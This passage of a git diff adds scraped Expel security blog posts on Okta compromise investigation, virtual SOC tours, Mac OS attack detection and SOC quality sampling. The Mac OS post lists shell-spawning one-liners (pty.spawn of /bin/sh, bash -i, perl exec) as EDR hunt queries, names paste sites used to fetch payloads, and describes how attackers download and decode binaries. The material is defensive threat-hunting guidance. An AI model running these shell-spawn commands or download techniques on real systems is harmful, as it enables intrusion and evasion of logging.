Improper application has the potential to lead to pitfalls and human error. That\u2019s why training a talented group of analysts to make sophisticated decisions matters. We\u2019ll be talking more about our analyst training and decision-making process in a future blog post. So stay tuned. Want to be notified when we share a new blog post? Subscribe to our EXE blogs and we\u2019ll send them directly to your inbox." +} \ No newline at end of file diff --git a/how-to-investigate-okta-compromise.json b/how-to-investigate-okta-compromise.json new file mode 100644 index 0000000000000000000000000000000000000000..bb52e9ac51a160f5b7c7ad81bc3d8f6711b99f75 --- /dev/null +++ b/how-to-investigate-okta-compromise.json @@ -0,0 +1,6 @@ +{ + "title": "How to investigate Okta compromise", + "url": "https://expel.com/blog/swimming-past-2fa-part-2-investigate-okta-compromise/", + "date": "Aug 31, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Swimming past 2FA, part 2: How to investigate Okta compromise Security operations \u00b7 6 MIN READ \u00b7 ASHWIN RAMESH \u00b7 AUG 31, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools In the first post of this two-part series , we shared how our security operations center (SOC) spotted an Okta credentials phishing attack. Now we\u2019re going to do a deep dive into how we investigated the incident. Before we jump in, it\u2019s super important that we call out that you can prevent this type of attack by rolling out phish-resistant multi-factor authentication (MFA) like FIDO/WebAuthn in Okta . The tweet below, courtesy of @boblord is the right way to think about MFA. The man, the myth, the legend. Bob Lord ( @boblord ) and all of his wisdom. Okay, now let\u2019s talk about the investigation. A quick reminder that we can track the attacker\u2019s activity by looking into Okta\u2019s event logs. These logs contain all sorts of details like where a user is logging in from and what they\u2019re trying to authenticate \u2013 to name a few. Okta, by design, is an Identity and Access Management (IAM) platform used to delegate access to multiple applications used within an org. It uses the Single Sign On (SSO) authentication scheme to deleg\u200b\u200bate access. A compromised Okta account can lead to disastrous downstream effects, basically giving the attacker access to all the applications authorized for the victim. But there\u2019s good news: Okta maintains detailed event logs that we can search for using the Events API. In this blog post, I\u2019m going to walk you through the event logs we reviewed during our investigation, our decision-making process and how we used automation to discover what happened within five minutes. Diving into logs After we realized that we were dealing with a potential Okta phishing attack, we immediately started reviewing the customer\u2019s Okta logs. The image below shows an Okta event log. Notice the event type is \u201cuser.authentication.sso.\u201d This event describes a login to an authorized application using the SSO authentication schema. The application accessed by the threat actor was Google\u2019s application suite (G Suite). Okta log This means that the attacker could access the victim\u2019s G Suite applications that were authorized by their org. That\u2019s bad news. At this stage, we knew we needed to comb through all G Suite activity logs. Exfiltrating data is the primary goal for this type of attack. So we started by looking at the victim\u2019s Google Drive audit logs. 
To dig deeper into these logs, we filtered on the value \u201cdrive\u201d stored under the keyword \u201capplicationName\u201d within the event details. Below is an example log of the external threat actor snooping around the victim\u2019s Google Drive. Google drive audit log The \u201cevents\u201d block within the event details gives us a lot of information to work with. For example, we can see that the attacker downloaded a private document called \u201cpersonal credit card info.\u201d Here\u2019s a list of the event details that stood out to us, and what they mean: doc_title: This is the current title for the document. doc_type: This represents the document type \u2013 a DOCtype document in our example. Other possible values include folder, jpeg, mp4, pdf and spreadsheet. originating_app_id: This is the unique Google Cloud project ID of the application that performed the specific action. You can use the following resource to resolve the ID to a specific client . In our example, the ID `691301496089` represents the \u201cGoogle Drive Web\u201d client. owner: This is the email address of the file\u2019s owner. In some cases, the owner can be the name of the Team drive for items contained within a Team drive. primary_event: This is a flag indicating whether this action is a primary event, or an event generated as a side effect of an associated primary event. visibility: This field describes the visibility of the file within the organization. Some of the different types of visibility include private, people_with_link and public_in_the_domain. A detailed description of these keywords can be found on Google\u2019s developer page . Pulling it all together Let\u2019s connect Looking at the log event details helps us paint a picture of what the attacker was trying to accomplish. Based on what we reviewed above, we noticed that the attacker was trying to download a personal Word document called personal credit card info from the victim\u2019s Google Drive application. This tells us that the attacker was actively snooping around for sensitive information. And when we see things like this \u2013 it\u2019s time to alert the customer. We immediately gave them their first set of remediation actions: Reset the victim\u2019s credentials so the attacker can no longer use the compromised credentials. Force an account logout so the attacker can longer use Okta to sign into other authorized apps. Reset the account\u2019s active sessions so the attacker can\u2019t use existing access tokens to access authorized applications. But we\u2019re not done here. There are still a few unanswered questions we had to chase, like: What else did the attacker download? Did they access other applications? Are there any other victims? We could sift through the audit logs for Okta and Google Drive to answer these questions, but that would be a laborious process. By the time we\u2019re done, the attacker would have wreaked havoc in the org\u2019s network. That\u2019s why we\u2019re big believers in automating things that can be automated . Luckily, I work with a great crew of engineers and we created automated workflows for our analysts. Now let\u2019s explore how we use tech like Expel\u2019s bots to answer some of those questions above. Automating workflows Take it from me \u2013 sifting through logs in Excel is not easy on a hectic day. You can easily glance over key events and miss vital evidence during a security incident. Remember, every second you save helps keep your org safe from baddies. 
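As an illustration of the kind of thing that's worth scripting, here's roughly what pulling those same Google Drive audit events yourself could look like using the Google Admin SDK Reports API. This is a sketch, not Expel's implementation - it assumes the google-api-python-client library and a service account with domain-wide delegation plus the admin.reports.audit.readonly scope, and the key file, admin address and IP below are all placeholders.

```python
from google.oauth2 import service_account
from googleapiclient.discovery import build

SCOPES = ["https://www.googleapis.com/auth/admin.reports.audit.readonly"]

# Placeholders: swap in your own service account key and an admin to impersonate.
creds = service_account.Credentials.from_service_account_file(
    "service-account.json", scopes=SCOPES).with_subject("admin@example.com")
reports = build("admin", "reports_v1", credentials=creds)

# Pull Drive audit events tied to a single suspicious IP (placeholder address).
resp = reports.activities().list(
    userKey="all",
    applicationName="drive",
    actorIpAddress="203.0.113.10",
    maxResults=1000,
).execute()

for activity in resp.get("items", []):
    actor = activity.get("actor", {}).get("email", "unknown")
    for event in activity.get("events", []):
        params = {p["name"]: p.get("value") for p in event.get("parameters", [])}
        print(activity["id"]["time"], actor, event.get("name"),
              params.get("doc_title"), params.get("visibility"))
```

Even a quick script like this gets you a reviewable list of who touched what, from where, in a couple of minutes - which is the same gap the investigative actions and workflows described next are designed to fill at scale.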
We use investigative actions to talk to the customer org\u2019s security devices. During an investigation, an analyst issues an investigative action by providing the right set of parameters to retrieve additional data for analysis. Below is an example of what entering these parameters into the Expel Workbench looks like. Query IP Investigative action being triggered to query for any events associated with the IP 192.168.0.1 And below is an example of what the results of the investigative action would look like in the Expel Workbench\u2122. Usually, the next step for the analyst is to either download the results and view them in Excel or view every event returned in the Expel Workbench data-viewer feature. The query IP investigative action returning results from the triggered API. During this investigation, we used our in-house bot, Ruxie\u2122, to create an investigative workflow to gather all Google Drive activity from the malicious IP. The results were formatted into an easily digestible report, which was uploaded to the Expel Workbench. Creating a workflow for Okta compromise Based on our investigation, we could tell that the attacker used the malicious IP 197.210.196.89. From there, we used the GCP Drive Audit Workflow to quickly arm the investigating analyst with additional leads into other actions performed by the malicious IP within the org\u2019s Google Drive application. Take a look below: Analyst triggering the GCP drive audit triage workflow. Once we enter the investigative action details, we get workflow outputs like what you see in the two images below. This lets us see if the IP was used to log into other compromised accounts, what files were accessed by the malicious IP and what actions were performed on them. Google Drive audit triage workflow output Within minutes, a list of file activity performed by the attacker from the malicious IP was uploaded to the Expel Workbench for the analyst to review. The attacker managed to access a few files. Based on the names of the files in the images above, it looks like they were looking for any document associated with the word \u201ccredit\u201d \u2013 fishing around for any sensitive data uploaded to the victim\u2019s Google Drive account. Once the analyst gathered this information, like with any investigation, we gave our customer a detailed report of the attacker\u2019s activity within their org and how to remediate. These reports include: A list of all the assets the attacker touched; A list of all compromised accounts observed within the org; The root cause or the initial attack vector (when possible); A list of remediation actions; and A list of resilience actions to stop future threats. Parting thoughts Reminder: Phish-resistant MFA like FIDO/WebAuthn is how you beat the bad actors here. It would have prevented this attack. Attackers are getting better day-by-day \u2013 like using phishing kits that can defeat legacy Time-Based One-Time Password (TOTP) and push-based 2FA. If this were to happen in your environment, the first thing you\u2019d want to do is remediate the account\u2019s credentials. However, the attacker might have already gotten the necessary access tokens to maintain their access in the victim\u2019s authorized applications. That\u2019s why we recommend you force an account logout, as well as clear all the current active sessions associated with the account. I hope you found this two-part blog series helpful. Still have questions about how we tackle phishing here at Expel? Find out more here !" 
+} \ No newline at end of file diff --git a/how-to-make-the-most-of-your-virtual-soc-tour.json b/how-to-make-the-most-of-your-virtual-soc-tour.json new file mode 100644 index 0000000000000000000000000000000000000000..1a373b5ac181f1a96c80ec31377d489f00b7e9ed --- /dev/null +++ b/how-to-make-the-most-of-your-virtual-soc-tour.json @@ -0,0 +1,6 @@ +{ + "title": "How to make the most of your virtual SOC tour", + "url": "https://expel.com/blog/how-to-make-the-most-of-your-virtual-soc-tour/", + "date": "Apr 20, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How to make the most of your virtual SOC tour Security operations \u00b7 3 MIN READ \u00b7 TYLER FORNES \u00b7 APR 20, 2021 \u00b7 TAGS: Guide / SOC Since 2020 and 2021 are apparently The Year (Years?) of Zoom, we\u2019re scrapping the in-person things that once felt like must-dos, like booking a plane ticket to meet face-to-face with that new vendor you\u2019re evaluating. In pre-pandemic days, we invited prospects to physically come and visit our headquarters and Security Operations Center (SOC). They got to tour our SOC, meet the team, chat with our execs and get a feel as to whether Expel was the right security partner for their org. In fact, we used to even give prospects a pre-read before coming to see us in Herndon. It wasn\u2019t the usual marketing fluff you\u2019d expect to receive; instead, it was a laundry list of recommendations for how to pressure test a potential security provider during the visit. Thanks to our new Zoom-first environment, we decided to create a new, completely virtual way to give prospects a strong sense of what working with Expel would really be like. Enter Expel\u2019s Virtual SOC tour. What\u2019s a virtual SOC tour? Our virtual SOC tour is exactly what it sounds like \u2013 we\u2019ve tried to recreate that former in-person experience to give our prospects a solid look at who we are and how we can support them. This behind-the-scenes look gives you a chance to: Meet our experts, including our CEO and at least one of our lead SOC analysts Get an understanding of what transparency means to Expel Learn what to expect as an Expel customer and how we\u2019d work with your team Ask all your burning questions How to prepare for your virtual SOC tour While there\u2019s nothing you have to do to prepare \u2013 the process is truly as simple as signing up and showing up from behind your computer screen \u2013 we like to share a few tips that\u2019ll help you get the most out of a virtual SOC tour. We think these are useful things to do whether you\u2019re meeting with us or another vendor. First, preparation is key. Go into the conversation knowing when you want to buy, what you want to pay and which SOC \u201cfeatures\u201d are must-haves for you and your team (24\u00d77 monitoring? Phishing support? Something else?). In addition to preparing and knowing what you want out of the meeting, come ready with a list of questions that\u2019ll help you truly get an understanding for how the vendor operates. Here are the things we think you should ask about as you\u2019re \u201ctouring\u201d with a potential new security partner. 5 questions to ask during your virtual SOC tour #1: \u201cCan I talk to a handful of your customers?\u201d You\u2019ll get a higher fidelity picture of customer life by talking to customers. (Shocking, right?) During a SOC tour, you\u2019ll likely be shown what the provider wants you to see by default. 
What we at Expel want you to see may be different than our competitors, but it will still be what we want you to see. Don\u2019t let a potential provider get away with that. If possible, line up the customer chats before (or shortly after) the virtual SOC tour. #2: \u201cIn the past 12 months, what third-party integrations have you done? Which features did you release and why?\u201d A vendor\u2019s plans for the future are well and good \u2026 and necessary. However, consider asking about what they\u2019ve built in the past. You know how you ask about work history when you\u2019re hiring someone? The same thing applies here, as past behavior is a great predictor of future action. Can the vendor answer questions about what they\u2019ve built so far? Can they tell you why they made the decisions they did? This will tell you a lot in a short time. #3: \u201cHow will you help take [annoying thing your team doesn\u2019t enjoy] off my plate?\u201d Be selfish. There are other things you want to get done besides the mundane day-to-day of security operations. What are the tasks you don\u2019t want to have to worry about? What would make you and your security team happy? (Yes, you can say \u201csecurity\u201d and \u201chappy\u201d in the same sentence.) #4: \u201cCan I see some deliverables?\u201d You\u2019ll definitely want to see some deliverables. These obviously have to be scrubbed, so asking in advance is important. In addition to asking for deliverables, ask to see what it looks like when something goes wrong. What does that communication loop look like? Because something will go wrong. Anyone who says otherwise is lying. #5: \u201cCan I set up some additional time to meet 1:1 with a shift analyst?\u201d Time to ask for something off script. During the virtual SOC tour, ask if you can spend a bit of time with a shift analyst \u2013 someone on the pointy end of the spear whose responsibility is providing service. If your request is met with anything but a resounding \u201cyes,\u201d that\u2019s a warning sign. When you talk to the analyst, have a conversation to find out what it\u2019s really like to work at the provider. Do you leave the chat wanting to hire them? That\u2019s telling. Make your potential provider uncomfortable Visiting your current \u2026 or would be \u2026 managed security provider can be a telling experience. It\u2019s the best way to separate fact from fiction and see what you\u2019re buying first hand. In addition to the mechanical requirements \u2013 like seeing the SOC, getting the security program presentation and peeking at the roadmap \u2013 think about evaluating the truth in between the lines. Want to join one of Expel\u2019s virtual SOC tours? Send us a note ." 
+} \ No newline at end of file diff --git a/how-to-make-your-org-more-resilient-to-common-mac-os.json b/how-to-make-your-org-more-resilient-to-common-mac-os.json new file mode 100644 index 0000000000000000000000000000000000000000..082cb60feefb53ec2af9584aeacf8ba2db3da747 --- /dev/null +++ b/how-to-make-your-org-more-resilient-to-common-mac-os.json @@ -0,0 +1,6 @@ +{ + "title": "How to make your org more resilient to common Mac OS ...", + "url": "https://expel.com/blog/how-to-make-org-more-resilient-common-mac-os-attacks/", + "date": "Jul 23, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG How to make your org more resilient to common Mac OS attacks Security operations \u00b7 6 MIN READ \u00b7 ANDREW PRITCHETT \u00b7 JUL 23, 2019 \u00b7 TAGS: EDR / Get technical / How to / Hunting / Vulnerability I remember when I got my first MacBook. My first \u201cmalware-less\u201d computer , I thought to myself. Fast forward a few years to when I started working in the information security world and my feelings of invincibility depreciated pretty rapidly. Although Mac OS attacks occur less often than Windows OS attacks, the implications of an attack happening on either OS can be lethal. If you work in cybersecurity, you know that attack trends are a thing. There\u2019s always some new hotness in attacker Tactics, Techniques, and Procedures (TTPs), which often parallels the TTPs of security red teamers. Why? Well, when you see something that works, why reinvent the wheel? At Expel, we\u2019re seeing more and more orgs utilizing Mac OS, yet there\u2019s still little discussion about practical enterprise security for Mac OS. But because plenty of our customers run Mac OS systems, we\u2019re calling attention to a few recent attack trends we\u2019re seeing and how you can make your org (and devices) more resilient. Recent Mac OS activity and detections There are two TTPs I\u2019ve seen recently that target Mac OS. The first involves the use of persistent interactive scripting interpreters to evade command line auditing. The second involves the use of launchd persistence to download encoded text and compile the encoded text into binary in order to evade perimeter content-based filtering and host-based AV. Using encoded commands from PowerShell is an effective technique that\u2019s been used by Windows attackers for a long time \u2026 Macs are no longer immune. Technique 1: Execution of persistent interactive scripting interpreters: What is it? Like PowerShell and CMD with Windows, what\u2019s a Mac without Bash and Python? Plenty of people love Python because you can use it as both a scripting interpreter and an interactive console. The only downside? Some of the features we love about Python also make it a security threat. For instance, I love how I can quickly write a Python script to conduct common Bash-like functions like making new files and directories. However, if you want to use the Bash syntax we all know and love, you can invoke Bash directly from Python and execute a command within an interactive Bash console. Using Bash, the ability to execute commands are nearly limitless on a Mac. Immediately following successful lateral movement to a Mac OS host, I\u2019ve seen attackers use \u201c/bin/bash\u201d to execute \u201c/usr/bin/nohup\u201d with parameters for an interactive Python console. 
If you\u2019re not familiar with the native BSD utility, the \u201cnohup\u201d utility invokes another utility \u2014 in this case it\u2019s Python \u2014 with its arguments and tells your system to ignore the \u201cSIGHUP\u201d signal. This is a problem because \u201cnohup\u201d allows the utility to remain active and hidden in the background even after a user signs out. Using Python, attackers then execute another interactive Bash terminal. He or she uses that interactive Bash terminal to execute Curl \u2014 which lets him or her download malicious shellcode from an online code repository like GitHub or Paste Code. Once the attacker gets his or her hands on the data they\u2019re looking for, that data is then executed locally. The acquired data is either exploit payloads like keyloggers and Keychain dumpers, or utilities to further the attacker\u2019s mission like media streamers for data exfiltration. The process looks something like this: Though this technique doesn\u2019t make it impossible to detect malicious activity, it definitely helps obscure the attacker\u2019s activity. For example: 1. Following the compromise of a user account with sudo permissions, an attacker executes a Python console which spawns another Bash under root context. 2. The attacker uses a utility such as Curl to download raw text, using it as shell code or converting it to binary. 3. The shell code or binary code is executed under root context. 4. Now the Bash history for the Curl activity mentioned above isn\u2019t in the user\u2019s \u201c.bash_history\u201d file or \u201c/var/root/.sh_history.\u201d And it\u2019s not mentioned in the Mac OS unified logs. So the crafty attacker goes undetected. How do you detect this type of attack? To detect this type of activity on your network, your best bet is to look at your Endpoint Detection and Response (EDR) tech recording process activity from the kernel level. Using your EDR, look for common code syntax to spawn a TTY shell from another shell. Try any of the following queries: python -c 'import pty; pty.spawn(\"/bin/sh\")' python -c 'import pty; pty.spawn(\"/bin/bash\")' bash -i /bin/sh -i perl -e 'exec \"/bin/sh\";' ruby: exec \"/bin/sh\" You can also look for any of these processes as the parent of a TTY shell: vi (or) vim nmap python perl ruby Java The next step in the process is to look for instances where the child process is a parent of \u201ccurl\u201d or \u201cwget,\u201d and where the process arguments point to an online code repository. Here are some examples of code repository domains that \u2014 in this context \u2014 should raise a red flag: paste[.]ofcode[.]org pastecode[.]xyz pastiebin[.]com paste[.]org raw[.]githubusercontent[.]com wstools[.]io gist[.]github[.]com pasted[.]co etherpad[.]org Snipplr[.]com By running the activities above using Carbon Black Response (one of the EDR techs that some of our customers use), I produced this recorded process tree: Looking at the curl process arguments resulting from the child bash shell, there\u2019s a command line argument noting a download from \u201craw[.]githubusercontent[.]com\u201d: How do I protect my org from this kind of attack in the future? 1. Determine if your engineering team has a business and/or production justification for granting any employees access to any of the online code repositories referenced above. If not, blacklist the domains using your network perimeter tech. 2. 
Use your EDR tech to set up a recurring hunt or custom detection to monitor for the activity discussed above. 3. Consider restricting standard user accounts from using \u201csudo\u201d or \u201croot,\u201d or implement a privilege control service like \u201cMake Me Admin\u201d or \u201cPrivileges.app\u201d so that user accounts can only be elevated to administrator level on a temporary basis. 4. If you don\u2019t have an EDR, go get one. Relying on local host-based detection is risky at best \u2014 without an EDR, it\u2019s easy to miss this type of activity. Technique 2: Launchd persistence to download encoded text What is it? I first saw this technique used by a sophisticated commodity malware masquerading as a legit media update. When an unsuspecting user tries to update the tech, the malware establishes persistence via \u201claunchd\u201d and creates and executes a randomly named sub-process from \u201c/private/tmp.\u201d Launchd allows an attacker to continually execute the malicious app every time a user logs on. Even if the user kills and deletes the processes running from \u201c/private/tmp\u201d the malicious process recreates the \u201c/private/tmp\u201d process again following a successful logon. The sub-process running from \u201c/private/tmp\u201d then executes \u201c/bin/bash\u201d and is followed by a series of strategic bash commands to assemble a malicious binary from raw text. A sub-process uses \u201c/bin/bash\u201d to pass a block of encoded text in an anonymous pipe which is then decoded by executing \u201c/usr/bin/base64.\u201d The decoded value is passed back through the anonymous pipe to \u201cxxd\u201d and formatted into hex. Once in hex, it\u2019s then reverted from hex to binary. The resulting malicious binary is then executed on the local host while leaving no evidence of a binary download at the perimeter of the network. The process looks like this: How do you detect this type of attack? Just like the first attack I described, your EDR tech is your best friend for detecting this one. However, identifying the specific commands executed by the attacker is a multi-step (aka not quick) process. Why? Because of the way that the kernel assigns the \u201cfile system value\u201d in place of the actual value being passed in the anonymous pipe. The screenshot below shows an actual process tree of an attacker attempting this technique as recorded by Crowdstrike Falcon . The command line for base64 specifies to decode (\u201c\u2013decode\u201d) the encoded value (\u201c/dev/fd/63\u201d). The encoded value is actually a base64 string, but you can\u2019t see the true value the attacker is attempting to decode. This creates an extra step for analysts in the investigation process. How can you discover that an attacker is storing data in an anonymous pipe? Use your EDR tech to look for processes with \u201c/dev/fd/63\u201d in command line arguments, especially if the process has the ability to encode, decode, archive or compile binaries. The occurrence of \u201c/dev/fd/63\u201d is not that common; however, you\u2019ll run into false positives. Once you find a couple suspicious processes with \u201c/dev/fd/63,\u201d make note of the process names, command lines, hosts and users associated with them. Now use your EDR technology to either \u201ctail\u201d or \u201cgrep\u201d the user\u2019s Bash history file for the process name and command line which included \u201c/dev/fd/63\u201d in its command line arguments. Here\u2019s how to do it using Carbon Black Response : 1. 
Use your EDR tech to get a copy of the user\u2019s bash history file: 2. Download the Bash history file and use a combination of \u201ctail\u201d and \u201cgrep\u201d to identify the process \u2014 in this case \u201cbase64\u201d \u2014 command which generated the recorded activity by your EDR tech: 3. The long base64 string follows the \u201c\u2013decode\u201d argument. You can use any number of tools or utilities, including \u201cbase64\u201d, to safely decode the string and find out what the attacker was trying to do. How do I protect my org from this kind of attack in the future? To make your org more resilient to this type of technique in the future, use your EDR tech to set up a recurring hunt or custom detection to monitor for processes with \u201c/dev/fd/63\u201d in command line arguments, especially if the process has the ability to encode, decode, archive or compile binaries. Then follow the suggested triage steps above. Need some help setting up a new hunt? Read our post on getting started with threat hunting . Bonus tip: all of these resilience actions will benefit your company\u2019s security posture if you\u2019ve got Linux hosts in your environment, too. Conclusion Whether its commodity malware or obfuscated command execution on Mac OS that keeps you up at night, there are some easy steps to take for detecting and triaging the problems \u2026 and keeping them from happening again. Have questions about detecting attacks on Mac OS, or want to know more about hunting for these types of threats? Send us a note ." +} \ No newline at end of file diff --git a/how-to-measure-soc-quality.json b/how-to-measure-soc-quality.json new file mode 100644 index 0000000000000000000000000000000000000000..77cea064505a830d0237c6c09a1a738082ab867c --- /dev/null +++ b/how-to-measure-soc-quality.json @@ -0,0 +1,6 @@ +{ + "title": "How to measure SOC quality", + "url": "https://expel.com/blog/how-to-measure-soc-quality/", + "date": "Jun 2, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG How to measure SOC quality Security operations \u00b7 8 MIN READ \u00b7 MATT PETERS AND JON HENCINSKI \u00b7 JUN 2, 2021 \u00b7 TAGS: MDR / Metrics / Tech tools There\u2019s a common assumption that there will always be tradeoffs between scale and quality. When we set out to build our security operations center (SOC) here at Expel, we didn\u2019t want to trade quality for efficiency \u2013 it just didn\u2019t feel right. So, when we started the team we pledged that quality and scale would increase together. Our team\u2019s response: challenge accepted. That commitment to quality now extends to every aspect of our operations \u2013 our customers can see everything we do. So our work has to be fast and it\u2019s got to be good. In previous posts, we\u2019ve talked a lot about how we\u2019ve scaled our SOC with automation . This is something of a sweet spot for us \u2013 we\u2019ve had some pretty good wins and learned a ton about metrics along the way. In this post, we\u2019re going to walk you through the quality end of the equation \u2013 how we measure and manage quality in our SOC. Along the way, we\u2019ll share a bit about the problems we\u2019ve encountered, how we\u2019ve thought about them and some of our guiding principles. TL;DR: quality is not based on what you assert, it\u2019s based on what you accept. It\u2019s not enough to say, \u201cWe\u2019re going to do lean six sigma\u201d \u2013 you have to inspect the work. And it\u2019s how you inspect the work that matters. 
A super quick primer on quality If you\u2019re new to quality and need a quick primer, read along. For folks who already know the difference between quality assurance and quality control, feel free to jump ahead. There are two key quality activities: quality assurance (QA) which is meant to prevent defects, and quality control (QC) which is used to detect them once they\u2019ve happened. In a SOC, QA are the improvements you build into your process. It\u2019s anything from a person asking, \u201cHey, can I get a peer review of this report?\u201d to an automated check (in our case, our bots) saying, \u201cTuning this alert will drop 250 thousand other alerts, are you sure?\u201d You probably have a ton of these checks in your SOC even if you don\u2019t call them QA. They\u2019re likely a build up of \u201cfix this\u201d, \u201cnow fix that\u201d type lessons learned. QC is a bit different. It measures the output of the process against an ideal. For example, in a lumber yard, newly milled boards are checked for the correct dimensions before they\u2019re loaded onto a truck. Quality control consists of three main components: What you\u2019re going to measure How you\u2019re going to measure it What you\u2019re going to do with the measurements What you measure For a mechanical process \u2013 like those newly milled boards \u2013 it\u2019s possible to check every board using some other mechanism. For investigations that require human judgement, we realized that anything more than trivial automated QC quickly became unsustainable \u2013 in our SOC we run ~33 investigations a day (based on Change Point analysis), and can\u2019t have another analyst check over each one or we\u2019d spend most of our time chasing ghosts. (There\u2019s that darn scale and quality tradeoff.) We didn\u2019t give up though \u2013 we just figured out that we needed to be more clever in how we apply our resources. We decided on two things: We would sample from the various operational outputs (like investigations, incidents and reports). Turns out, there\u2019s an industry standard on how to do that! We would ensure the sample was representative of the total population. Following these two guidelines, we use our sample population as a proxy for the larger output population. By measuring the quality in our sample, we can determine if our process is working at a reasonable level. ISO 2859-1 \u2013 Acceptable Quality Limits (AQL) has entered the chat. TL;DR on ISO 2859-1: You make things AKA your \u201clot.\u201d AQL tells you how many items (in our case: alerts/investigations/incidents) you should inspect based on how many you produce to achieve a reasonable measure of overall quality. AQL also tells you how many defects equal a failed quality inspection. If your sample contains more defects than allowed by the AQL limit, you fail. If not, you pass. There are three inspection levels. The better your quality is, the less of your lot you have to inspect. The worse your quality is, well, you\u2019re inspecting more. Here\u2019s an AQL calculator that I\u2019ve found super helpful. Reminder: Quality is not based on what you assert, it\u2019s based on what you inspect. Let\u2019s put this into practice using some made-up numbers with our actual SOC process: On a typical day in our SOC: We\u2019ll process millions of events using our detection bot we\u2019ve named Josie . Those millions of events will result in about 500 alerts sent to a SOC analyst for human judgment. 
About 33 alerts will result in a deeper dive investigation; and Two to three security incidents. The image below gives a high-level visual of how the system works. You\u2019ll see that security signals come in, are processed with a detection engine and then a human takes a sample of the data and applies their expertise to determine quality. High level diagram of Expel detection system The chart below shows that we break our SOC output up into three lots. SOC output Work item Daily lot size Alerts ~500 Investigations 30 Incidents 2-3 Recall that with AQL there are three inspection levels (I, II, III). We use General Inspection Level I at Expel. Reminder: this assumes quality is already good and it\u2019s also the lowest cost. If you\u2019re just getting started, it\u2019s OK to start with Level I. If, after inspecting, you find your quality isn\u2019t that great \u2013 it\u2019s time to move up a level. Now, this is the point where you can manually review AQL tables or you can use an online AQL calculator to make things a bit easier. Let\u2019s try this with our alert lot. Our lot is about 500 alerts. My General Inspection Level is I, so I\u2019m going to set an AQL limit of no more than four defects. AQL indicates we should review 20 alerts to have a sample that\u2019s representative of the total population of alerts. If we apply the same methodology across all of our work, here\u2019s what our sampling ends up looking like: SOC output aka \u201clot size\u201d vs. sample size Work item Daily lot size General Inspection Level Sample size AQL Limit Alerts ~500 I 20 4 Investigations 30 I 5 4 Incidents 2-3 I 3 4 How you measure Once we\u2019ve arrived at a sample population, we need a way to measure it against what\u2019s considered good. As we built our process, we decided to adhere to a mantra: Our measurements must be accurate and precise We need a way to measure accuracy \u2013 it has to represent the true difference between an output and the ideal. If you\u2019re stuck on this, we found the best thing to do is try to convert whatever we were looking at into a number. For example, if you need your report to have high-quality writing, try a grammar score rather than relying on judgements (\u201cthe author\u2019s use of metaphor was challenging\u2026\u201d). In addition to being accurate, we need measurements to be precise. In other words, it needs to be reproducible \u2013 we work in shifts and if one shift is consistently easier graders, it\u2019s going to cause a problem. For us, that\u2019s where the QC check sheet came in. A QC check sheet is a simple and easy way to summarize things that happened. Think about your car\u2019s safety inspection. After the super fun time of waiting in line, the technician walks through a series of specific \u201cchecks\u201d and collects information about defects detected. Wipers? Check! Headlights? Check! Brakes? Doh! If all things check out, you pass inspection. If your brakes don\u2019t work (major defect), you fail inspection. Like a car inspection at an auto shop, our team performs an inspection; the inspector will follow a series of defined checks and the outcome of each check will be recorded and scored. If you\u2019re wondering what our SOC QC check sheet looks like, you can go and grab a copy at the end of this post. Putting it all together We have our sample size. We have our QC check sheet. But how do we go about randomly selecting our sample? A Jupyter notebook of course! We use the python pandas library to draw samples at random. 
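If you want to reproduce the selection step, a minimal sketch looks like the code below. It assumes the day's work has already been pulled from the Workbench APIs into pandas DataFrames, and the sample sizes mirror the General Inspection Level I table above; the names here are illustrative, not our production notebook.

```python
import pandas as pd

# Sample sizes from the General Inspection Level I AQL table above.
AQL_SAMPLE_SIZES = {"alerts": 20, "investigations": 5, "incidents": 3}

def draw_qc_sample(lot: pd.DataFrame, work_item: str, seed=None) -> pd.DataFrame:
    """Randomly select the AQL sample for one lot of SOC output."""
    n = min(AQL_SAMPLE_SIZES[work_item], len(lot))  # small lots: inspect everything
    return lot.sample(n=n, random_state=seed)

# e.g., alerts_df holds one row per alert triaged on the inspection day:
# qc_alerts = draw_qc_sample(alerts_df, "alerts")
```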
We collect these samples from work that happened during the day and night hours. We perform quality inspections every day. Let\u2019s walk through one: We open our Jupyter quality control notebook and select which day\u2019s work we want to inspect. We record the inspector, smash the \u201cStart Quality Check\u201d button and then we\u2019re off to the races. Expel SOC QC check initialization step Our Jupyter Notebook reads from Expel Workbench\u2122 APIs to determine how much work we did on May 5, 2021. In the table below you can see we triaged 672 alerts, performed 67 investigations, ran down one security incident and moved 85 alerts to an open investigation. Expel SOC QC random selection step You may be thinking: but you said you typically handle about 500 alerts per day and 30 investigations. Great catch. Change-Point Analysis is your huckleberry for determining your daily mean. (More details on Change-Point Analysis here .) Then our Jupyter notebook will break our work out into three lots as seen in the image below. Selecting the button within each section will pull in the random sample size based on an AQL check sheet specific to each lot. Expel SOC QC notebook lots On May 5, 2021, we handled one security incident. Let\u2019s walk through our inspection. Going back to the image above, if we select the \u201cReview incidents\u201d button, our notebook will show the sample and the QC check sheet specific to that class of work. In this case, we\u2019re looking at incidents. Expel SOC QC incident check sheet Our QC check sheet is focused on making sure we\u2019re following the right investigative process. Did we take the right action? Did we populate the right remediation actions? Did we zig when we should have zagged? When a defect is found, we remediate the issue, record it and then trend defects by work type. If we exceed a certain number of defects for that day, we fail based on AQL. What you\u2019re going to do with the measurements If we imagine this QC thing as a cycle, what we\u2019re trying to do is (a) measure the quality, (b) learn from the measurements and (c) improve quality. In order to do this, we decided we needed our quality metrics and process to have three attributes: The metrics we produce are digestible Our quality checks are performed daily, for every shift What we uncover will be reviewed and folded into improvements in the system So, from the process above, we can roll up our pass/fail rate as the one digestible metric, which allows us to see where we\u2019re struggling: Expel SOC quality pass / fail rate since March 2020 We then deploy technology, training and mentoring to make sure the quality and scale improve over time. In fact, our SOC quality program is a key driver in a number of recent initiatives including: Automated orchestration of Amazon Web Services (AWS) Expel alerts. We detected variance with respect to how each analyst investigated AWS activity, so we automated it. Automated commodity malware and BEC reporting. Typed input is prime for defects. As you can imagine, we detected a good number of defects in the \u201cfindings\u201d reports for our top two incident classes, so we automated them. Scale and quality both went up! Recap and final thoughts Here\u2019s a super quick recap on what we just walked through: Use ISO 2859-1 (AQL) to determine sample size. Jupyter notebooks help you perform random selection. Inspect each random sample using a check sheet to spot defects. Count and trend the defects to produce digestible metrics to improve quality. 
